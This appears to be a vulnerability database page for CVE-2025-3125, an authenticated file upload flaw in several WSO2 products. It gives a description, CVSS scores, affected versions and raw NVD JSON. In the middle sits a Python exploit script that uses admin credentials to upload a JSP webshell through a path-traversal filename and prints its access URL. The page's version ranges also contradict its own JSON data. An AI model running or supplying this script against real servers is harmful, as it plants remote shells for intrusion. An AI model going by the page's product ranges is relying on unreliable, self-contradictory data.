CVE-2025-3125

Description

An arbitrary file upload vulnerability exists in multiple WSO2 products due to improper input validation in the CarbonAppUploader admin service endpoint. An authenticated attacker with appropriate privileges can upload a malicious file to a user-controlled location on the server, potentially leading to remote code execution (RCE). This functionality is restricted by default to admin users; therefore, successful exploitation requires valid credentials with administrative permissions.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:* - VULNERABLE

WSO2 API Manager < 4.3.0

WSO2 Identity Server < 7.1.0

WSO2 Enterprise Integrator < 7.2.0

WSO2 Open Banking AM < 3.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-3125 PoC - WSO2 CarbonAppUploader Arbitrary File Upload
# Target: WSO2 products with CarbonAppUploader admin service

def upload_payload(target_url, username, password, payload_path):
    """
    Upload malicious file via CarbonAppUploader endpoint
    """
    # Construct upload endpoint URL
    upload_url = f"{target_url}/services/CarbonAppUploader"
    
    # Prepare malicious file content (e.g., JSP webshell)
    with open(payload_path, 'r') as f:
        payload_content = f.read()
    
    # Construct multipart form data
    files = {
        'filename': ('..\\..\\..\\webapps\\ROOT\\shell.jsp', payload_content),
    }
    
    # Authentication headers
    auth = (username, password)
    
    try:
        # Send upload request
        response = requests.post(upload_url, files=files, auth=auth, verify=False, timeout=30)
        
        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[+] Access payload at: {target_url}/shell.jsp")
            return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload_file>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    payload = sys.argv[4]
    
    upload_payload(target, user, pwd, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-3125
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-3125
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-3125/
[4] VulDB https://vuldb.com/cve/CVE-2025-3125
[5] https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-3961/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-3125", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2025-11-05T15:15:33.953", "lastModified": "2025-12-04T21:06:46.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability exists in multiple WSO2 products due to improper input validation in the CarbonAppUploader admin service endpoint. An authenticated attacker with appropriate privileges can upload a malicious file to a user-controlled location on the server, potentially leading to remote code execution (RCE).\n\nThis functionality is restricted by default to admin users; therefore, successful exploitation requires valid credentials with administrative permissions."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DEEA7DB5-BBF7-44A4-9FB6-0D235A44C680"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E31E32CD-497E-4EF5-B3FC-8718EE06EDAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B58251E8-606B-47C8-8E50-9F9FC8C179BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "E21D7ABF-C328-425D-B914-618C7628220B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "51465410-6B7C-40FD-A1AB-A14F650A6AC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "851470CC-22AB-43E4-9CC6-5E22D49B3572"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EBAB99E-6F0F-4CE9-A954-E8878826304C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "0B3E6207-B2CF-487C-9CB8-906248B665C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "D47B760D-5418-4FB0-88F0-3F78BAFF63E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:enterprise_integrator:6.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "E4A07C73-3E6B-4CF9-BEB9-39C6081C0332"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4F126CA-A2F9-44F4-968B-DF71765869E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "2153AECE-020A-4C01-B2A6-F9F5D98E7EBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "32CE7893-AD1A-49E5-BD1A-5E9C2DEB8764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "EA76533A-5BED-4BDC-B348-EB3D3FDFB110"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "C1EFBD0F-9664-4EF3-9908-C72B1318F68F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server_as_key_manager:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "6BB34405-A2F1-461A-B51B-E103BB3680A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:open_banking_iam:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7C241A3-8EA0-41E4-ABF3-21B9D8E7A5BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:traffic_manager:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7413107-D7B2-49AE-AC46-52E7BFCD6ED8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:universal_gateway:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "61636553-C25E-44DF-93D7-EB3E1056D1DC"}]}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-3961/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "tags": ["Vendor Advisory"]}]}}